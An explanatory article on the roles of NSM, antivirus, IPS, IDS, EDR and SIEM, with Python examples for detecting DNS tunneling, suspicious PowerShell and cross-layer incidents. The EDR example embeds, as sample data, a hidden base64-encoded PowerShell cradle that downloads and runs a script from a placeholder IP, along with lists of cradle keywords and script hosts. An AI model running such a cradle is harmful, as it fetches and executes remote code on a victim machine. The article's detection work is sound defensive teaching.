NSM vs AV vs IPS vs IDS vs EDR: What Your Security Architecture Is Probably Missing
Many organizations believe they are "secure" because they have a firewall and antivirus installed.
Then a breach happens.
A common reason: the team never understood the difference between NSM, AV, IPS, IDS, and EDR, or, more importantly, how those pieces are meant to work together.
This article explains each component and shows how the layers fit into a modern security architecture.
Why One Security Tool Is Never Enough
Cyber attacks today are commonly:
- Encrypted in transit, so a device inspecting payloads sees nothing useful
- Fileless, running entirely in memory without dropping a binary to disk
- Living-off-the-land, abusing built-in tools such as PowerShell, WMI, and rundll32
- Recognizable only by behavior, not by a file hash or byte pattern
- Designed and tested to bypass signature detection before they are launched
No single tool can detect all of this.
Security today is about layered visibility and control.
Let’s break down each layer.
1. NSM (Network Security Monitoring)
The Visibility Layer
Network Security Monitoring focuses on deep inspection and long-term analysis of network traffic.
Unlike IPS, NSM does not primarily block traffic. Its job is to observe, record, detect patterns, and support investigation.
Think of NSM as CCTV for your network — always watching, always recording.
What NSM Collects
- Full packet capture (PCAP), usually for a limited retention window
- NetFlow / connection metadata (who talked to whom, when, how many bytes)
- DNS logs
- HTTP logs
- TLS metadata (SNI, certificate details, cipher suites), even when the payload cannot be read
- Firewall logs
- IDS alerts
What NSM Is Good At
- Detecting lateral movement inside the network
- Detecting data exfiltration
- Identifying suspicious DNS tunneling
- Supporting forensic investigations
- Providing historical visibility
If an attacker bypasses your firewall and AV, NSM is often the system that reveals what actually happened.
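The DNS tunneling detection listed above, as an added example that is not code from the original article or from any NSM product: it parses a constructed, Zeek-style dns.log excerpt and flags a registered domain when a client sends many unique, long, high-entropy subdomains to it. The log lines, the domain names, the client IPs and the thresholds are assumptions made for illustration; a real deployment would read Zeek's dns.log (TSV or JSON) and tune the thresholds against a baseline.

```python
import math
from collections import defaultdict

# Constructed, Zeek-style dns.log excerpt (tab-separated: ts, id.orig_h, query, qtype_name).
# These records are made up for the example; they are not real traffic.
SAMPLE_DNS_LOG = """\
1700000001.1\t10.0.0.5\twww.example.com\tA
1700000002.4\t10.0.0.5\tmail.example.com\tA
1700000003.0\t10.0.0.7\t3q8c0zj7fh2k9d1a.x7p1ml.data-relay.net\tTXT
1700000003.2\t10.0.0.7\tk2d9f8h3j1l0p5qz.a9s2tt.data-relay.net\tTXT
1700000003.5\t10.0.0.7\tm4n7b1v3c5x9z2l8.q0w2er.data-relay.net\tTXT
1700000003.7\t10.0.0.7\tt6y1u3i5o7p9a2s4.d3f5gh.data-relay.net\tTXT
1700000004.0\t10.0.0.5\twww.example.com\tA
1700000004.1\t10.0.0.7\tr8e2w4q6z0x1c3v5.b7n9mk.data-relay.net\tTXT
1700000004.3\t10.0.0.7\th1j3k5l7z9x2c4v6.p1o3iu.data-relay.net\tTXT
1700000004.6\t10.0.0.7\ty7t5r3e1w9q0a2s4.g4h6jk.data-relay.net\tTXT
1700000004.8\t10.0.0.7\tf2g4h6j8k0l1z3x5.c7v9bn.data-relay.net\tTXT
1700000005.0\t10.0.0.5\tapi.example.com\tA
1700000005.1\t10.0.0.7\tn3m5b7v9c1x2z4l6.s8d0fg.data-relay.net\tTXT
1700000005.3\t10.0.0.7\tu9i7o5p3a1s2d4f6.w5e7rt.data-relay.net\tTXT
1700000006.0\t10.0.0.5\tcdn.example.com\tA
1700000006.2\t10.0.0.5\twww.example.com\tA
1700000007.0\t10.0.0.5\tmail.example.com\tA
1700000008.0\t10.0.0.5\tlogin.example.com\tA
"""


def shannon_entropy(text):
    """Bits per character: 0 for 'aaaa', close to log2(len) for random-looking labels."""
    if not text:
        return 0.0
    counts = defaultdict(int)
    for ch in text:
        counts[ch] += 1
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def registered_domain(query):
    # Simplification: the last two labels are treated as the registrable domain.
    # Production NSM should use the Public Suffix List (co.uk, com.au, ...).
    labels = query.rstrip(".").split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else query


def parse_dns_log(text):
    records = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        ts, orig_h, query, qtype = line.split("\t")
        records.append({"ts": float(ts), "src": orig_h, "query": query.lower(), "qtype": qtype})
    return records


def find_tunneling_candidates(records, min_queries=8, min_unique_ratio=0.9,
                              min_entropy=3.5, min_first_label=12):
    """Group queries by registered domain and score each domain on tunneling traits:
    almost every query has a new subdomain, labels are long, and they look random."""
    by_domain = defaultdict(list)
    for r in records:
        by_domain[registered_domain(r["query"])].append(r)
    findings = []
    for domain, recs in by_domain.items():
        if len(recs) < min_queries:
            continue
        subs = [r["query"][: -(len(domain) + 1)] for r in recs if r["query"] != domain]
        if not subs:
            continue
        unique_ratio = len(set(subs)) / len(recs)
        avg_entropy = sum(shannon_entropy(s.replace(".", "")) for s in subs) / len(subs)
        avg_first_label = sum(len(s.split(".")[0]) for s in subs) / len(subs)
        # Record types that carry a large answer payload are the tunnel's downlink.
        bulk_types = sum(1 for r in recs if r["qtype"] in ("TXT", "NULL", "CNAME", "MX"))
        if unique_ratio >= min_unique_ratio and avg_entropy >= min_entropy \
                and avg_first_label >= min_first_label:
            findings.append({
                "domain": domain,
                "queries": len(recs),
                "clients": sorted({r["src"] for r in recs}),
                "unique_subdomain_ratio": round(unique_ratio, 2),
                "avg_entropy": round(avg_entropy, 2),
                "bulk_qtype_ratio": round(bulk_types / len(recs), 2),
            })
    return sorted(findings, key=lambda f: -f["queries"])


if __name__ == "__main__":
    for hit in find_tunneling_candidates(parse_dns_log(SAMPLE_DNS_LOG)):
        print(hit)
```

In the sample only data-relay.net is reported; example.com has the same query volume but repeats a handful of short, low-entropy names. CDN, telemetry and antivirus-update domains legitimately produce hash-like labels, so a production rule needs a baseline period and an allowlist, and the per-domain byte counts from the conn log are the next thing to join in.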
2. AV (Antivirus)
The Basic Endpoint Protection Layer
Antivirus runs directly on endpoints, workstations and servers alike, on Windows, macOS, and Linux.
It scans files (and, in most current products, process memory) for known malicious signatures, supplemented by simple heuristics.
What AV Does Well
- Detect known malware
- Stop common ransomware variants
- Quarantine infected files
Where AV Fails
- Fileless attacks that never write a payload to disk
- PowerShell and other living-off-the-land abuse, because the binary being executed is legitimate and signed
- Credential dumping with tooling that has been repacked or is run from memory
- Advanced persistent threats, whose operators test their tooling against current AV engines before use
AV is necessary — but it is not sufficient.
3. IPS (Intrusion Prevention System)
The Real-Time Blocking Layer
IPS sits inline in your network path:
Internet → Firewall → IPS → Internal Network
It inspects traffic in real time and blocks known malicious activity.
What IPS Does
- Blocks malicious IP addresses
- Stops exploit attempts
- Drops suspicious packets
- Prevents command-and-control traffic
IPS is your network gatekeeper.
Because it is inline, it is also a point of failure: a false positive blocks legitimate traffic, and you must decide whether the device fails open (traffic passes uninspected) or fails closed (traffic stops) when it crashes or is overloaded.
IPS focuses on prevention of known patterns, not deep investigation, and it cannot see inside encrypted sessions unless TLS is terminated or decrypted in front of it.
4. IDS (Intrusion Detection System)
The Alerting Layer
IDS monitors a copy of the traffic (from a SPAN port or a network TAP) rather than sitting in the forwarding path, so it cannot block anything.
It generates alerts when a signature or behavior rule matches.
IDS is often used when organizations want visibility without risking false-positive blocking. Many engines, Suricata and Snort among them, run in either mode, so the IDS/IPS distinction is about how the sensor is deployed, not which product you buy.
Think of IDS as an alarm system: it tells you someone is inside, it does not lock the door.
5. EDR (Endpoint Detection & Response)
The Advanced Endpoint Intelligence Layer
EDR is the evolution of traditional antivirus.
Instead of only scanning files, EDR continuously records endpoint telemetry (process creation with command lines, parent/child relationships, network connections, file and registry changes) and evaluates behavior across those events.
What EDR Detects
- Suspicious PowerShell execution
- Credential dumping activity
- Abnormal process chains
- Lateral movement techniques
What EDR Can Do
- Detect
- Block
- Investigate
- Isolate compromised machines
If AV is a guard, EDR is a trained investigator.
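The process-chain and PowerShell checks listed above, as an added example that is not code from the original article or from any EDR vendor: it builds a process tree from constructed, Sysmon-style process-creation events, flags an Office application spawning a script host, and decodes a hidden, base64-encoded PowerShell command so the analyst sees the download cradle instead of an opaque blob. The hostnames, PIDs, paths, user names and the 198.51.100.10 address are made-up sample data. Real EDR keys processes by a process GUID rather than by (host, pid), since PIDs are reused.

```python
import base64
import json
import re

# Payload used only to build the constructed sample event below (documentation-range IP).
_DECODED_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.10/a.ps1')"
# PowerShell's -EncodedCommand takes base64 of the UTF-16LE script text.
_ENCODED_PAYLOAD = base64.b64encode(_DECODED_PAYLOAD.encode("utf-16le")).decode()

# Constructed, Sysmon-style process-creation events as JSON lines. Not real telemetry.
SAMPLE_EVENTS = "\n".join(json.dumps(e) for e in [
    {"ts": 1700000100, "host": "WS-042", "pid": 4120, "ppid": 1000, "user": "CORP\\alice",
     "image": "C:\\Windows\\explorer.exe", "cmdline": "C:\\Windows\\explorer.exe"},
    {"ts": 1700000160, "host": "WS-042", "pid": 5200, "ppid": 4120, "user": "CORP\\alice",
     "image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE",
     "cmdline": "\"C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE\" /n invoice.docm"},
    {"ts": 1700000165, "host": "WS-042", "pid": 5310, "ppid": 5200, "user": "CORP\\alice",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": f"powershell.exe -NoP -W Hidden -enc {_ENCODED_PAYLOAD}"},
    # Benign: an admin script launched from Explorer, plain -File, no encoding.
    {"ts": 1700000400, "host": "WS-042", "pid": 5400, "ppid": 4120, "user": "CORP\\alice",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1"},
])

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe"}
CRADLE_MARKERS = ("downloadstring", "downloadfile", "invoke-expression", "iex",
                  "frombase64string", "invoke-webrequest")
# Any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...) is accepted by PowerShell,
# so match "-e<letters>" followed by a long base64 argument.
ENCODED_RE = re.compile(r"(?:^|\s)-e[a-z]*\s+([A-Za-z0-9+/=]{20,})", re.IGNORECASE)
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden", re.IGNORECASE)


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def load_events(text):
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def ancestry(event, procs, max_depth=8):
    """Walk ppid links upward and return the chain root-first, e.g. explorer > winword > powershell."""
    chain = [basename(event["image"])]
    cur = event
    for _ in range(max_depth):
        parent = procs.get((cur["host"], cur["ppid"]))
        if parent is None:
            break
        chain.append(basename(parent["image"]))
        cur = parent
    return list(reversed(chain))


def decode_encoded_command(cmdline):
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def _finding(event, chain, rule, detail, severity="high"):
    return {"host": event["host"], "pid": event["pid"], "user": event["user"], "rule": rule,
            "severity": severity, "chain": " > ".join(chain), "detail": detail}


def evaluate(events):
    procs = {(e["host"], e["pid"]): e for e in events}
    findings = []
    for e in events:
        child = basename(e["image"])
        chain = ancestry(e, procs)
        parent = chain[-2] if len(chain) >= 2 else None
        if parent in OFFICE_APPS and child in SCRIPT_HOSTS:
            findings.append(_finding(e, chain, "office_spawns_script_host", e["cmdline"]))
        decoded = decode_encoded_command(e["cmdline"]) if child in ("powershell.exe", "pwsh.exe") else None
        if decoded is not None:
            severity = "medium"
            if HIDDEN_RE.search(e["cmdline"]) or any(k in decoded.lower() for k in CRADLE_MARKERS):
                severity = "high"
            findings.append(_finding(e, chain, "encoded_powershell", decoded, severity))
    return findings


if __name__ == "__main__":
    for f in evaluate(load_events(SAMPLE_EVENTS)):
        print(f"{f['severity']:6} {f['rule']:26} {f['chain']}  ::  {f['detail']}")
```

The benign backup script from Explorer produces no finding even though it uses -ExecutionPolicy Bypass; the Word-spawned PowerShell produces two, and the decoded detail is what the SOC analyst pivots on (the URL goes straight to the NSM and firewall logs). A signature-based AV sees only powershell.exe, a signed Microsoft binary, in both cases.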
Side-by-Side Comparison
| System | Runs Where | Detect | Block | Investigation Depth | Focus |
|---|---|---|---|---|---|
| AV | Endpoint | Yes | Yes | Low | Known malware (signatures) |
| EDR | Endpoint | Yes | Yes | High | Endpoint behavior and response |
| IDS | Network (TAP/SPAN) | Yes | No | Medium | Alerting on known patterns |
| IPS | Network (inline) | Yes | Yes | Medium | Blocking known patterns |
| NSM | Network (TAP/SPAN) | Yes | Usually no | Very high | Full visibility and forensics |
| SIEM | Log layer | Yes (by correlation) | No | High | Cross-source correlation |
How Modern Security Architecture Works
A mature architecture combines all layers:
Endpoints → AV / EDR
Network → IDS / IPS
Traffic Visibility → NSM
Central Log Correlation → SIEM
Automation & Orchestration → SOAR
Each layer covers blind spots of the others.
System Diagram (How These Components Fit Together)
```mermaid
flowchart TB
    Internet["Internet"] --> FW["Firewall"]
    FW --> IPS["IPS (Inline Blocking)"]
    IPS --> LAN["Internal Network (LAN)"]
    %% Endpoint layer
    LAN --> EP["Endpoints / Servers"]
    EP --> AV["AV (File/Signature Protection)"]
    EP --> EDR["EDR (Behavior + Response)"]
    %% Detection vs prevention on the network
    LAN --> IDS["IDS (Alerting)"]
    LAN --> NSM["NSM (Zeek/PCAP/Flow Visibility)"]
    %% Telemetry to SIEM
    FW --> SIEM["SIEM (Correlation)"]
    IPS --> SIEM
    IDS --> SIEM
    NSM --> SIEM
    AV --> SIEM
    EDR --> SIEM
    %% Automation
    SIEM --> SOAR["SOAR (Automation/Orchestration)"]
    SOAR --> RESP["Response Actions<br/>- Block IP / isolate host<br/>- Create ticket<br/>- Notify SOC<br/>- Run playbook"]
    %% Notes
    classDef layer fill:#fff,stroke:#999,stroke-width:1px;
    class Internet,FW,IPS,LAN,EP,AV,EDR,IDS,NSM,SIEM,SOAR,RESP layer;
```
How to Read This Diagram
- Firewall + IPS sit inline and are your front-line blockers; they are the only network devices in this picture that can stop a packet.
- IDS receives a copy of the traffic (TAP or SPAN port) and alerts on suspicious activity without blocking.
- NSM receives the same copy and keeps the long-term record (what happened, when, and how).
- AV + EDR protect endpoints, which is where most attacks ultimately execute.
- SIEM is the central brain that correlates signals from every layer.
- SOAR turns alerts into consistent response actions.
They are complementary — not replacements.
Executive Perspective: Why This Matters
When a customer says:
"We already have firewall and antivirus."
The real question is:
- Who detects lateral movement between internal hosts?
- Who sees DNS tunneling when the rest of the session is encrypted?
- Who reconstructs the attacker's timeline after the fact?
- Who correlates endpoint and network activity into one incident?
That is where NSM, EDR, SIEM, and automation become critical.
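A minimal version of the cross-layer correlation described in "How Modern Security Architecture Works" and asked for in the executive questions above, as an added example that is not part of the original article or of any SIEM product: events from IDS, NSM, EDR and AV are normalized to a hostname, clustered per host inside a time window, and escalated only when independent layers corroborate each other. The events, the IP-to-asset mapping, the scores and the thresholds are all constructed for illustration.

```python
from collections import defaultdict

WINDOW_SECONDS = 600   # events on one host within 10 minutes belong to one incident (assumed)
ESCALATE_SCORE = 8     # page-out threshold; tune per environment (assumed)

# Constructed asset inventory (a DHCP or CMDB lookup in practice): source IP -> hostname.
ASSET_MAP = {"10.0.0.7": "WS-042", "10.0.0.5": "WS-011"}

# Constructed events from four layers, already parsed into dicts. Not real telemetry.
EVENTS = [
    {"source": "edr", "ts": 1700000165, "host": "WS-042",
     "rule": "office_spawns_script_host", "score": 4},
    {"source": "ids", "ts": 1700000170, "src_ip": "10.0.0.7", "dst_ip": "198.51.100.10",
     "signature": "POLICY scripting user-agent to external host", "score": 2},
    {"source": "nsm", "ts": 1700000172, "src_ip": "10.0.0.7", "dst_ip": "198.51.100.10",
     "dst_port": 80, "bytes_out": 1400, "bytes_in": 52000, "score": 1},
    {"source": "edr", "ts": 1700000180, "host": "WS-042",
     "rule": "lsass_memory_access", "score": 5},
    # Same IDS signature on another host with nothing around it: noise until corroborated.
    {"source": "ids", "ts": 1700003000, "src_ip": "10.0.0.9", "dst_ip": "203.0.113.5",
     "signature": "POLICY scripting user-agent to external host", "score": 2},
    # AV quarantined a file and nothing else fired: a ticket, not a page-out.
    {"source": "av", "ts": 1700003100, "host": "WS-088",
     "detection": "Trojan.Generic", "action": "quarantined", "score": 3},
]


def normalize(events, asset_map=ASSET_MAP):
    """Give every event a hostname (network sensors only know the IP) and a one-line summary."""
    out = []
    for e in events:
        host = e.get("host") or asset_map.get(e.get("src_ip"), e.get("src_ip"))
        if e["source"] == "ids":
            summary = f"IDS alert: {e['signature']} -> {e['dst_ip']}"
        elif e["source"] == "nsm":
            summary = (f"NSM conn: {e['dst_ip']}:{e['dst_port']} "
                       f"in={e['bytes_in']}B out={e['bytes_out']}B")
        elif e["source"] == "edr":
            summary = f"EDR: {e['rule']}"
        else:
            summary = f"AV: {e['detection']} ({e['action']})"
        out.append({"host": host, "ts": e["ts"], "source": e["source"],
                    "score": e["score"], "summary": summary})
    return sorted(out, key=lambda x: (x["host"], x["ts"]))


def _summarize(host, cluster, threshold):
    sources = sorted({ev["source"] for ev in cluster})
    score = sum(ev["score"] for ev in cluster)
    # One sensor fires on its own all day. The same score reached by two independent
    # layers (endpoint plus network) is what justifies waking someone up.
    escalate = score >= threshold and len(sources) >= 2
    return {"host": host, "score": score, "sources": sources, "escalate": escalate,
            "first_seen": cluster[0]["ts"], "last_seen": cluster[-1]["ts"],
            "timeline": [f"{ev['ts']} [{ev['source']}] {ev['summary']}" for ev in cluster]}


def correlate(normalized, window=WINDOW_SECONDS, threshold=ESCALATE_SCORE):
    """Cluster each host's time-ordered events; a gap longer than the window starts a new incident."""
    by_host = defaultdict(list)
    for ev in normalized:
        by_host[ev["host"]].append(ev)
    incidents = []
    for host, evs in by_host.items():
        cluster = [evs[0]]
        for ev in evs[1:]:
            if ev["ts"] - cluster[-1]["ts"] <= window:
                cluster.append(ev)
            else:
                incidents.append(_summarize(host, cluster, threshold))
                cluster = [ev]
        incidents.append(_summarize(host, cluster, threshold))
    return sorted(incidents, key=lambda i: (-i["score"], i["host"]))


if __name__ == "__main__":
    for inc in correlate(normalize(EVENTS)):
        flag = "ESCALATE" if inc["escalate"] else "log only"
        print(f"{inc['host']:10} score={inc['score']:2} sources={','.join(inc['sources'])} {flag}")
        for line in inc["timeline"]:
            print("   ", line)
```

Only WS-042 escalates: the EDR process alert, the IDS policy hit, the NSM connection showing a 52 KB download from the same external address, and the LSASS access fifteen seconds later line up into one timeline. The identical IDS signature on 10.0.0.9 stays a low-scoring single-source event, and the AV quarantine on WS-088 is logged but not paged; that is also a reminder that an IP with no asset-map entry keeps its raw address as its "host" and never joins the endpoint's events, which is why inventory quality is a detection problem.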
Final Takeaway
- AV catches known malicious files.
- EDR watches endpoint behavior and lets you respond.
- IPS blocks known network threats inline.
- IDS alerts on suspicious traffic without blocking it.
- NSM provides deep visibility and forensic power.
- SIEM correlates everything into one picture.
Security today is not about one tool.
It is about layered defense, visibility, and response capability.
That is the foundation of modern cyber resilience.